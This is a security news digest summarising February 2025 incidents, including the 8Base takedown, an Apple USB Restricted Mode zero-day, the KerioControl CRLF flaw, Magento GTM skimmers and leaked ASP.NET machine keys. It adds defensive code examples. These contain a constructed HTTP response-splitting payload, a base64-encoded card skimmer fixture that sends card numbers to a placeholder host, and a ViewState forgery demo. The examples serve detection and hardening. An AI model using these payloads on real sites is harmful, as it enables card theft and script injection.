Daily Brief

Article summaries below are machine-generated.
2025-02-11 07:13:01 thehackernews CYBERCRIME International Law Enforcement Seizes 8Base Ransomware Sites, Arrests Suspects
A coordinated international law enforcement operation, dubbed "Operation Phobos Aetor," dismantled the 8Base ransomware gang's dark web data leak and negotiation sites. Participants included the FBI, the UK's NCA, Europol, and agencies from countries including Germany, Spain, and Japan. The seized sites now display a banner naming the Bavarian State Criminal Police Office and the Office of the Public Prosecutor General in Bamberg. Four European nationals were arrested in Thailand in connection with ransomware deployments that specifically targeted companies in Switzerland; mobile phones, laptops, and cryptocurrency wallets were seized during the arrests. The suspects are believed to have collected about $16 million from attacks on more than 1,000 victims worldwide. 8Base used double extortion (exfiltrate first, then encrypt) and built its attacks on the Phobos ransomware. The takedown follows earlier disruptions of the Hive, LockBit, and BlackCat operations.
2025-02-11 04:36:20 thehackernews CYBERCRIME Apple Fixes Exploited Security Flaw in Emergency iOS Update
Apple released emergency updates for iOS and iPadOS to close an actively exploited flaw, CVE-2025-24200, that allowed an attacker with physical access to disable USB Restricted Mode on a locked device. USB Restricted Mode exists to block data extraction over the device's USB port by digital forensic tools once the device has been locked for a while. Apple describes the bug as an authorization issue fixed with improved state management. The zero-day was reported by The Citizen Lab at the University of Toronto's Munk School, which has previously documented attacks on Apple users with commercial spyware such as NSO Group's Pegasus. Users should install the update promptly to prevent further abuse of the flaw.
2025-02-11 02:02:38 theregister CYBERCRIME Apple Issues Patches for Sophisticated iPhone, iPad Attacks
Apple has patched a flaw in USB Restricted Mode on iPhones and iPads that was used in what the company calls extremely sophisticated physical attacks against specific targeted individuals. USB Restricted Mode, introduced in 2018, shuts off data transfer over the device's port once it has been locked for more than an hour, to block unauthorized access over a physical connection. Apple's advisory is unusually candid in acknowledging that the protection could be bypassed and that the bug was actively exploited. NIST's vulnerability database records the flaw as an authorization issue fixed through improved state management. Fixes ship in iOS 18.3.1 and iPadOS 18.3.1 for iPhone XS and later and the corresponding iPad generations. Bill Marczak of Citizen Lab is credited with reporting the bug, and users are urged to update promptly. The episode highlights the tension Apple faces between protecting users and demands for lawful access to devices in investigations.
2025-02-11 00:00:09 bleepingcomputer CYBERCRIME Over 12,000 Firewalls Vulnerable to Critical Exploitation Flaw
More than 12,000 internet-exposed GFI KerioControl firewalls remain vulnerable to CVE-2024-52875, a flaw that security researcher Egidio Romano reported and demonstrated as a one-click remote code execution attack. The root cause is HTTP response splitting: attacker-controlled input reaches an HTTP response header, which enables reflected cross-site scripting (XSS) and, chained further, one-click RCE. Exploitation attempts that use Romano's proof-of-concept to steal administrator CSRF tokens have been observed in the wild. GFI fixed the bug in version 9.4.5 Patch 1 on December 19, 2024, and shipped 9.4.5 Patch 2 on January 31, 2025 with further hardening, but a large share of devices, concentrated in Iran, the United States, Italy, Germany, Russia, and Brazil, are still unpatched.
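The bug class behind the KerioControl flaw, shown as an added example (not GFI's code and not Romano's proof-of-concept). It assumes a hypothetical redirect endpoint that copies a user-supplied `dest` parameter into the Location header; the parameter name, the payload and the naive response parser are all constructed for illustration. The vulnerable builder lets CR/LF in the parameter close the header block early, so one request yields two responses and the second carries attacker HTML; the hardened builder rejects control characters and non-local targets.

```python
"""HTTP response splitting: vulnerable and hardened redirect builders.

Added example, not KerioControl or Egidio Romano code. `dest` is a
hypothetical parameter name; the payload and parser are constructed.
"""

CRLF = "\r\n"


class BadRedirectTarget(ValueError):
    """Raised by the hardened builder when `dest` is rejected."""


def build_redirect_vulnerable(dest: str) -> bytes:
    """Vulnerable: `dest` lands in the header block unfiltered, so a value
    containing CR/LF terminates the headers early and everything after it
    is parsed as a second, attacker-authored response."""
    return (
        f"HTTP/1.1 302 Found{CRLF}"
        f"Location: {dest}{CRLF}"
        f"Content-Length: 0{CRLF}"
        f"{CRLF}"
    ).encode("latin-1")


def build_redirect_hardened(dest: str) -> bytes:
    """Fixed: refuse control characters (CR and LF included) and allow only
    same-origin absolute paths, which also blocks open-redirect abuse."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in dest):
        raise BadRedirectTarget("control character in redirect target")
    if not dest.startswith("/") or dest.startswith("//"):
        raise BadRedirectTarget("only same-origin absolute paths are allowed")
    return (
        f"HTTP/1.1 302 Found{CRLF}"
        f"Location: {dest}{CRLF}"
        f"Content-Length: 0{CRLF}"
        f"{CRLF}"
    ).encode("latin-1")


def parse_responses(raw: bytes) -> list[dict]:
    """Consume a byte stream the way a naive client or proxy would: status
    line, headers up to the first blank line, then Content-Length bytes of
    body, repeated until no further status line is found."""
    responses = []
    while True:
        sep = raw.find(b"\r\n\r\n")
        if sep < 0:
            break
        head_lines = raw[:sep].decode("latin-1").split(CRLF)
        status = head_lines[0]
        if not status.startswith("HTTP/"):
            break
        headers = {}
        for line in head_lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = sep + 4
        body = raw[body_start:body_start + length]
        responses.append({"status": status, "headers": headers, "body": body})
        raw = raw[body_start + length:]
    return responses


# Constructed attack value: a redirect to "/" whose header block is closed
# early, followed by a complete second response carrying attacker HTML.
# In a real reflected-XSS chain that script would run in the admin's origin.
INJECTED_HTML = "<script>alert(1)</script>"
SPLIT_PAYLOAD = (
    "/" + CRLF
    + "Content-Length: 0" + CRLF
    + CRLF
    + "HTTP/1.1 200 OK" + CRLF
    + "Content-Type: text/html" + CRLF
    + f"Content-Length: {len(INJECTED_HTML)}" + CRLF
    + CRLF
    + INJECTED_HTML
)


def demo() -> tuple[int, int]:
    """(responses parsed from the vulnerable builder given the payload,
    responses parsed from the hardened builder given a benign target)."""
    split = parse_responses(build_redirect_vulnerable(SPLIT_PAYLOAD))
    clean = parse_responses(build_redirect_hardened("/admin/"))
    return len(split), len(clean)


if __name__ == "__main__":
    vuln_count, clean_count = demo()
    print(f"vulnerable builder: {vuln_count} responses from one request")
    print(f"hardened builder: {clean_count} response")
    try:
        build_redirect_hardened(SPLIT_PAYLOAD)
    except BadRedirectTarget as exc:
        print(f"hardened builder rejected payload: {exc}")
```

The practical check on a real appliance is the same shape: send a redirect-triggering request whose parameter contains a URL-encoded `%0d%0a` and see whether the raw response contains a second status line. If it does, the device is still on the vulnerable build.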
2025-02-10 22:21:48 theregister CYBERCRIME Global Sting Dismantles 8Base Ransomware Crew, Four Arrested
Law enforcement agencies across the US, Europe, and Asia have dismantled the 8Base ransomware group and arrested four European suspects in Thailand. The group's dark web portal was seized; the crew is accused of extorting roughly $16 million from more than 1,000 victims worldwide since 2022. Europol and the UK's National Crime Agency took part, with Europol expected to publish further details. Thai police seized phones, laptops, and cryptocurrency wallets during the arrests. Switzerland and the US have both requested extradition; the US charges include conspiracy and wire fraud. The operation's name, "Operation Phobos Aetor," points to links between 8Base and the previously disrupted Phobos ransomware operation. Some dark web watchers asked whether the shutdown was an exit scam, but the police seizure indicates the group was genuinely taken down. Researchers are watching for a rebrand or re-emergence under a new name, a pattern seen with other ransomware groups.
2025-02-10 19:13:10 bleepingcomputer NATION STATE ACTIVITY Apple Patches Sophisticated Zero-Day Exploit Targeting iPhones
Apple released emergency security updates for CVE-2025-24200, a zero-day exploited in what the company calls extremely sophisticated attacks against specific targeted individuals. The bug is an authorization issue in iOS and iPadOS that lets an attacker with physical access disable USB Restricted Mode on a locked device; it is fixed with improved state management in iOS 18.3.1 and iPadOS 18.3.1, and Apple urges all iPhone and iPad users to update. Citizen Lab reported the flaw and is known for tracking attacks on high-risk targets such as journalists and dissidents. Two earlier Citizen Lab discoveries, CVE-2023-41061 and CVE-2023-41064, formed the zero-click chain used to deliver NSO Group's Pegasus spyware. Apple patches several exploited zero-days in a typical year.
2025-02-10 18:48:16 bleepingcomputer CYBERCRIME Hacker Admits Guilt in SEC X Account SIM Swap Fraud
Eric Council Jr. of Alabama has pleaded guilty to carrying out the SIM swap that let co-conspirators take over the U.S. Securities and Exchange Commission's X account in January 2024. Using a forged identification card and the victim's personal details, Council obtained a replacement SIM for the phone number tied to the account, which gave the group control of it; they then posted a fake announcement that the SEC had approved Bitcoin ETFs. Bitcoin briefly rose by about $1,000 on the news and fell by roughly $2,000 after SEC Chairman Gary Gensler posted a correction. Council was paid about $50,000 in Bitcoin for his part. Searches recovered from his personal computer showed he was worried about an FBI investigation. He pleaded guilty to conspiracy to commit aggravated identity theft and access device fraud, faces up to five years in prison, and is due to be sentenced on May 16.
2025-02-10 16:53:22 bleepingcomputer CYBERCRIME Cyberattack Disrupts Lee Enterprises, Affecting U.S. Newspapers
Lee Enterprises suffered a cyberattack on February 3, 2025 that disrupted operations across its U.S. newspapers. Business applications that support printing and delivery went down, VPN access was cut off, and reporters and editors lost access to their files and systems. The company is still assessing whether, and which, sensitive data was affected, is working with law enforcement, and is restoring services. Its newspaper websites posted notices blaming "maintenance" for problems with subscription accounts and e-editions. Lee publishes 77 daily and 350 weekly titles reaching millions of readers in print and online. In 2020 the company was also breached by Iranian hackers shortly before the U.S. presidential election.
2025-02-10 16:53:22 bleepingcomputer CYBERCRIME Global Crackdown on Phobos Ransomware Leads to Four Arrests
A global law enforcement operation, "Phobos Aetor," has taken down a major part of the Phobos ransomware operation. Four European suspects were arrested in Phuket, Thailand, accused of attacking more than 1,000 victims worldwide and extorting roughly $16 million in Bitcoin. Coordinated raids at four locations yielded laptops, smartphones, and cryptocurrency wallets, and the 8Base dark web sites used in the attacks were seized. The suspects allegedly hit at least 17 Swiss companies with the usual double-extortion playbook: data theft, file encryption, and ransom demands in cryptocurrency. Ransom payments were routed through cryptocurrency mixing services, which made the money harder to trace. Agencies from Thailand, Romania, Germany, Switzerland, Japan, the USA, and several EU states took part, and the suspects face extradition to Switzerland at the Swiss authorities' request.
2025-02-10 15:20:20 thehackernews MALWARE Hackers Use Google Tag Manager to Inject Skimmers in Magento Sites
Threat actors are abusing Google Tag Manager (GTM) to load credit card skimmers on Magento e-commerce sites. According to Sucuri, the injected code looks like an ordinary GTM or Google Analytics loader, and a backdoor was also planted for persistent access. Six Magento sites were found loading the malicious container, GTM-MLHK2N68; three were still infected at the time of the report. The injection lives in Magento's cms_block.content database table as an encoded JavaScript snippet that runs as a skimmer on checkout pages, capturing card data and sending it to an attacker-controlled server. Sucuri has previously seen GTM abused for malvertising and, in a separate campaign, exposed similar abuse of WordPress plugins and rogue admin accounts.
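A triage pass over Magento `cms_block` rows for the pattern described above, as an added example (not Sucuri's or Magento's code). It takes `(identifier, content)` pairs such as a dump of `SELECT identifier, content FROM cms_block`, flags GTM container IDs that are not on the store's allowlist or that match the indicator from the report, and decodes long base64 runs to see whether they hide checkout- or card-related script. The rows, the allowlisted container ID `GTM-STORE001`, the skimmer snippet and the `collector.example` hostname are constructed; the only real indicator is `GTM-MLHK2N68`.

```python
"""Triage of Magento cms_block rows for a GTM-delivered skimmer.

Added example, not Sucuri's or Magento's code. The rows, the allowlisted
container ID (GTM-STORE001) and the skimmer snippet are constructed; the only
real indicator is the container ID from the Sucuri report, GTM-MLHK2N68.
"""
import base64
import re

ALLOWED_GTM_IDS = {"GTM-STORE001"}        # constructed: containers the store owns
KNOWN_BAD_GTM_IDS = {"GTM-MLHK2N68"}      # indicator from the Sucuri report above

GTM_ID_RE = re.compile(r"\bGTM-[A-Z0-9]{4,12}\b")
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")   # long base64 runs are rare in CMS HTML
SUSPICIOUS_CALLS = ("atob(", "eval(", "String.fromCharCode", "unescape(", "document.write(")
SKIMMER_KEYWORDS = ("checkout", "cc_number", "cvv", "card", "btoa(", "new image(",
                    "xmlhttprequest", "fetch(")


def decode_base64_blobs(text: str) -> list[str]:
    """Return each long base64 run in `text` that decodes to printable text."""
    decoded = []
    for blob in B64_BLOB_RE.findall(text):
        try:
            plain = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if plain and sum(ch.isprintable() for ch in plain) / len(plain) > 0.9:
            decoded.append(plain)
    return decoded


def scan_block(identifier: str, content: str) -> list[str]:
    """Return human-readable findings for one cms_block row (empty if clean)."""
    findings = []
    for gtm_id in sorted(set(GTM_ID_RE.findall(content))):
        if gtm_id in KNOWN_BAD_GTM_IDS:
            findings.append(f"known-malicious GTM container {gtm_id}")
        elif gtm_id not in ALLOWED_GTM_IDS:
            findings.append(f"unrecognised GTM container {gtm_id}")
    lowered = content.lower()
    for call in SUSPICIOUS_CALLS:
        if call.lower() in lowered:
            findings.append(f"obfuscation primitive {call!r}")
    for plain in decode_base64_blobs(content):
        hits = [kw for kw in SKIMMER_KEYWORDS if kw in plain.lower()]
        if hits:
            findings.append("encoded script referencing " + ", ".join(hits))
    return findings


def scan_rows(rows: list[tuple[str, str]]) -> dict[str, list[str]]:
    """Map identifier -> findings for every row that produced at least one."""
    report = {}
    for identifier, content in rows:
        findings = scan_block(identifier, content)
        if findings:
            report[identifier] = findings
    return report


# Standard GTM loader with the container ID left as a placeholder.
GTM_LOADER = (
    "<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),"
    "event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;"
    "j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);})"
    "(window,document,'script','dataLayer','__ID__');</script>"
)

# Constructed skimmer fragment; collector.example is a placeholder hostname.
SKIMMER_SRC = ("var f=document.querySelector('#checkout');"
               "var cc=f.querySelector('[name=cc_number]').value;"
               "new Image().src='https://collector.example/?d='+btoa(cc);")
SKIMMER_B64 = base64.b64encode(SKIMMER_SRC.encode()).decode()

# Constructed cms_block rows: two benign, one carrying the rogue container
# plus an encoded inline payload.
SAMPLE_ROWS = [
    ("footer_links", '<ul><li><a href="/contact">Contact</a></li></ul>'),
    ("gtm_head", GTM_LOADER.replace("__ID__", "GTM-STORE001")),
    ("promo_banner",
     '<div class="promo">Free shipping over $50</div>'
     + GTM_LOADER.replace("__ID__", "GTM-MLHK2N68")
     + f"<script>eval(atob('{SKIMMER_B64}'))</script>"),
]

if __name__ == "__main__":
    for identifier, findings in scan_rows(SAMPLE_ROWS).items():
        print(identifier)
        for finding in findings:
            print("  -", finding)
```

The allowlist is the important part: a GTM loader is legitimate on most stores, so the signal is a container ID nobody on the marketing team recognises, not the loader itself. The same scan should also be run over `core_config_data` and theme templates, which are the other places Sucuri-style injections land.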
2025-02-10 15:04:50 bleepingcomputer CYBERCRIME Microsoft Enhances Copilot AI Bug Bounty Program Rewards
Microsoft has raised the payouts in its Copilot bug bounty program; moderate-severity findings now earn up to $5,000. The program's scope now covers more Copilot consumer products and services, including Copilot for Telegram and WhatsApp. Awards range from $250 for low-severity issues to $30,000 for critical ones, in line with Microsoft's other bounty programs such as those for Bing and Windows. The goal is to give researchers more incentive to find and report flaws across the growing Copilot ecosystem. The expansion sits within Microsoft's Secure Future Initiative, launched after the Cyber Safety Review Board, which is part of the U.S. Department of Homeland Security, sharply criticized the company's security practices.
2025-02-10 13:12:01 theregister CYBERCRIME Major US Publisher Faces Disruptions After Cybersecurity Incident
Lee Enterprises suffered a "cybersecurity event" that disrupted newspaper production across the 25 states in which it publishes. Effects included smaller issues and delayed print and e-editions, because automated production processes stopped working after the incident began on February 3, 2025. CEO Kevin Mowbray said the company is investigating, has notified law enforcement, and is taking steps to prevent a recurrence. Virginia's Daily Progress and The Buffalo News were among the hardest hit, while St Louis' Post-Dispatch kept printing in reduced form. Lee's financial results, published shortly after the event, showed digital revenue up and no material impact on operations reported so far. Recovery and assessment continue, and as of the latest update the incident had not been reported to the Securities and Exchange Commission.
2025-02-10 12:15:37 thehackernews DATA BREACH Microsoft Warns of Critical ASP.NET Machine Key Exploits
Microsoft has warned that more than 3,000 ASP.NET machine keys that were publicly disclosed in code documentation and repositories are being used for ViewState code injection attacks. The validationKey and decryptionKey are what authenticate and protect ViewState, so anyone who knows them can craft a malicious ViewState that the server will accept and deserialize; attackers have used this to load the Godzilla post-exploitation framework and run code on IIS servers. Microsoft has removed key samples from its documentation and advises organizations to treat machine keys as secrets and to rotate any that may have been exposed. The same weekly recap notes Wiz Research's discovery of a publicly exposed DeepSeek database that leaked sensitive data before being locked down, reminds readers to patch recent CVEs including ones affecting Zimbra Collaboration and Cisco Identity Services Engine, and cautions that adopting AI tools brings privacy and security risks that call for careful management of data permissions.
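An audit-and-rotate helper for the machine key problem above, as an added example (not Microsoft's code or tooling). It parses a web.config, flags any static `<machineKey>` whose validationKey matches a list of known-public keys, generates replacement keys of the right length, and, with a deliberately simplified MAC model, shows that a ViewState signed with the disclosed key is accepted until the key is rotated. The web.config, the "publicly disclosed" key value, the payload bytes and the MAC model (HMAC-SHA256 over the payload, ignoring ASP.NET's per-page modifier and purpose strings) are all constructed for illustration.

```python
"""Audit and rotate ASP.NET <machineKey> settings, and show why a disclosed
validationKey lets an attacker forge ViewState.

Added example, not Microsoft code. The web.config, the "publicly disclosed"
key value and the ViewState payload are constructed. The MAC model is a
simplification of ASP.NET's ViewState MAC (it ignores the per-page
modifier and purpose strings); it is only here to show that knowing the
key is all a forger needs.
"""
import hashlib
import hmac
import secrets
import xml.etree.ElementTree as ET

# Constructed stand-in for keys that have appeared in public docs or repos.
PUBLIC_KEYS = {"A1" * 64}

# Constructed web.config with a static key copied from a "public" source.
SAMPLE_WEB_CONFIG = f"""<configuration>
  <system.web>
    <machineKey validationKey="{'A1' * 64}"
                decryptionKey="{'B2' * 32}"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

STATIC_KEY_MSG = "static validationKey configured (treat as a secret; rotate if ever exposed)"
PUBLIC_KEY_MSG = "validationKey matches a publicly disclosed key"


def find_machine_keys(config_xml: str) -> list[dict]:
    """Collect every <machineKey> element with its effective attributes."""
    found = []
    for el in ET.fromstring(config_xml).iter("machineKey"):
        found.append({
            "validationKey": el.get("validationKey", "AutoGenerate,IsolateApps"),
            "decryptionKey": el.get("decryptionKey", "AutoGenerate,IsolateApps"),
            "validation": el.get("validation", "HMACSHA256"),
        })
    return found


def assess(entry: dict) -> list[str]:
    """Flag static keys, known-public keys and weak MAC algorithms."""
    issues = []
    vk = entry["validationKey"].upper()
    if vk.startswith("AUTOGENERATE"):
        return issues
    issues.append(STATIC_KEY_MSG)
    if vk in PUBLIC_KEYS:
        issues.append(PUBLIC_KEY_MSG)
    if entry["validation"].upper() not in ("HMACSHA256", "HMACSHA384", "HMACSHA512"):
        issues.append(f"weak validation algorithm {entry['validation']}")
    return issues


def generate_machine_key() -> dict:
    """Fresh random keys: 64 bytes for HMACSHA256 validation, 32 bytes for AES-256."""
    return {
        "validationKey": secrets.token_hex(64).upper(),
        "decryptionKey": secrets.token_hex(32).upper(),
        "validation": "HMACSHA256",
        "decryption": "AES",
    }


def rotate(config_xml: str) -> str:
    """Return the config with every <machineKey> replaced by fresh keys."""
    root = ET.fromstring(config_xml)
    for el in root.iter("machineKey"):
        for attr, value in generate_machine_key().items():
            el.set(attr, value)
    return ET.tostring(root, encoding="unicode")


def sign_viewstate(payload: bytes, validation_key_hex: str) -> bytes:
    """Simplified MAC: HMAC-SHA256 over the serialized ViewState."""
    return hmac.new(bytes.fromhex(validation_key_hex), payload, hashlib.sha256).digest()


def viewstate_accepted(payload: bytes, mac: bytes, validation_key_hex: str) -> bool:
    """What the server checks before deserializing (and thus before any gadget runs)."""
    return hmac.compare_digest(sign_viewstate(payload, validation_key_hex), mac)


def demo() -> dict:
    """Attacker signs a payload with the public key; server accepts it until rotation."""
    current = find_machine_keys(SAMPLE_WEB_CONFIG)[0]
    forged = b"<constructed serialized ViewState carrying a deserialization gadget>"
    mac = sign_viewstate(forged, current["validationKey"])      # attacker side
    accepted_before = viewstate_accepted(forged, mac, current["validationKey"])
    rotated = find_machine_keys(rotate(SAMPLE_WEB_CONFIG))[0]
    accepted_after = viewstate_accepted(forged, mac, rotated["validationKey"])
    return {"issues": assess(current),
            "accepted_before": accepted_before,
            "accepted_after": accepted_after}


if __name__ == "__main__":
    result = demo()
    for issue in result["issues"]:
        print("issue:", issue)
    print("forged ViewState accepted with disclosed key:", result["accepted_before"])
    print("forged ViewState accepted after rotation:   ", result["accepted_after"])
```

Rotation is necessary but not sufficient: a server that was already compromised via a forged ViewState may carry a web shell or other persistence that survives the key change, so rotated hosts still need an investigation pass.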
2025-02-10 11:06:35 thehackernews MISCELLANEOUS Essential Security Configurations for Okta Identity Protection
Okta underpins identity and access for more than 18,000 customers, which also makes it an attractive target. Okta has recently warned of phishing campaigns in which attackers impersonate Okta support to hijack corporate identities and the sensitive data behind them. The article walks through six Okta settings that materially raise the bar: strong password policies, phishing-resistant MFA, ThreatInsight, ASN binding for admin sessions, session lifetime limits, and behavior detection rules. It recommends continuous monitoring through SaaS Security Posture Management (SSPM) tooling to catch and fix misconfigurations across the organization's SaaS estate, and closes with a pitch for proactive adoption of SSPM capabilities.
2025-02-10 09:46:26 thehackernews CYBERCRIME DragonRank Targets IIS Servers in Asia for SEO Fraud and Malware
The DragonRank group has been compromising Internet Information Services (IIS) servers in Asian countries including India, Thailand, and Japan for a search engine optimization (SEO) fraud campaign. The attackers install the BadIIS malware, which tampers with the server's responses to send visitors to illegal gambling sites and potentially other malicious pages. The campaign is financially motivated and has hit government, technology, and telecommunications organizations. BadIIS inspects the User-Agent and Referer of each request and alters the HTTP response headers only for traffic that matches, redirecting legitimate visitors to unauthorized pages while other requests are served normally. The activity is linked to previously documented clusters tracked as Group 9 and Group 11, which also abused compromised IIS servers. Separately, researchers tied the China-based Funnull CDN to "infrastructure laundering": renting IP space from major providers such as Amazon Web Services and Microsoft Azure to host criminal sites used for retail phishing, romance scams, and money laundering through fake gambling platforms.
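One way to hunt for the referer-conditional behaviour described above in ordinary IIS logs, as an added example (not Trend Micro, Microsoft or DragonRank code). A BadIIS-style module answers the same URI differently depending on who asks, so the heuristic groups W3C log lines by URI and compares the redirect rate for search-referred visitors against direct visitors; a URI that redirects the former and serves 200 to the latter is flagged. The log lines, the documentation-range IP addresses, the short crawler and search-engine marker lists and the 50% threshold are all constructed assumptions.

```python
"""Cloaking heuristic over IIS W3C logs.

A URI that answers search-referred visitors with a redirect while answering
direct visitors with 200 matches the referer-conditional behaviour described
above. Added example, not Trend Micro, Microsoft or DragonRank code; the log
lines and the flagging threshold are constructed assumptions, and the
crawler/search-engine marker lists are deliberately short.
"""
from collections import defaultdict

SEARCH_REFERER_HOSTS = ("google.", "bing.", "yahoo.", "baidu.", "yandex.", "duckduckgo.")
CRAWLER_UA_MARKERS = ("googlebot", "bingbot", "baiduspider", "yandexbot")
REDIRECT_RATE_THRESHOLD = 0.5   # assumption: half or more search visitors redirected

# Constructed IIS W3C extended log; client addresses are documentation ranges.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-02-10 09:00:01 10.0.0.5 GET /news/index.aspx - 443 - 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0)+Chrome/121.0 - 200 0 0 120
2025-02-10 09:00:04 10.0.0.5 GET /news/index.aspx - 443 - 192.0.2.50 Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) - 200 0 0 90
2025-02-10 09:00:09 10.0.0.5 GET /news/index.aspx - 443 - 198.51.100.7 Mozilla/5.0+(Windows+NT+10.0)+Chrome/121.0 https://www.google.com/search?q=news 302 0 0 35
2025-02-10 09:00:15 10.0.0.5 GET /news/index.aspx - 443 - 198.51.100.8 Mozilla/5.0+(iPhone)+Safari/605.1 https://www.bing.com/search?q=news 302 0 0 33
2025-02-10 09:01:00 10.0.0.5 GET /about.aspx - 443 - 203.0.113.11 Mozilla/5.0+(Windows+NT+10.0)+Chrome/121.0 https://www.google.com/search?q=about 200 0 0 40
2025-02-10 09:01:05 10.0.0.5 GET /about.aspx - 443 - 203.0.113.12 Mozilla/5.0+(Windows+NT+10.0)+Firefox/122.0 - 200 0 0 44
"""


def parse_w3c(text: str):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue    # skip malformed lines rather than mis-align columns
        yield dict(zip(fields, parts))


def classify(rec: dict) -> str:
    """crawler / search_visitor / direct, from User-Agent and Referer."""
    ua = rec.get("cs(User-Agent)", "-").lower()
    referer = rec.get("cs(Referer)", "-").lower()
    if any(marker in ua for marker in CRAWLER_UA_MARKERS):
        return "crawler"
    if any(host in referer for host in SEARCH_REFERER_HOSTS):
        return "search_visitor"
    return "direct"


def find_cloaked_uris(text: str) -> dict:
    """Return URIs whose search-referred visitors are redirected but direct visitors are not."""
    stats = defaultdict(lambda: defaultdict(lambda: {"redirect": 0, "total": 0}))
    for rec in parse_w3c(text):
        bucket = stats[rec["cs-uri-stem"]][classify(rec)]
        bucket["total"] += 1
        if 300 <= int(rec["sc-status"]) < 400:
            bucket["redirect"] += 1

    flagged = {}
    for uri, classes in stats.items():
        search = classes.get("search_visitor")
        direct = classes.get("direct")
        if not search or not direct:
            continue    # need both populations to compare
        search_rate = search["redirect"] / search["total"]
        direct_rate = direct["redirect"] / direct["total"]
        if search_rate >= REDIRECT_RATE_THRESHOLD and direct_rate == 0:
            flagged[uri] = {
                "search_visitor_redirect_rate": search_rate,
                "direct_redirect_rate": direct_rate,
                "crawler_hits": classes.get("crawler", {}).get("total", 0),
            }
    return flagged


if __name__ == "__main__":
    for uri, info in find_cloaked_uris(SAMPLE_LOG).items():
        print(f"{uri}: search visitors redirected {info['search_visitor_redirect_rate']:.0%}, "
              f"direct visitors {info['direct_redirect_rate']:.0%}, "
              f"crawler hits {info['crawler_hits']}")
```

A hit from this heuristic is a lead, not a verdict: confirm it by requesting the URI yourself with and without a search-engine Referer and comparing the raw responses, then check the IIS module list (`%windir%\system32\inetsrv\appcmd list modules`) for native modules that nobody installed on purpose.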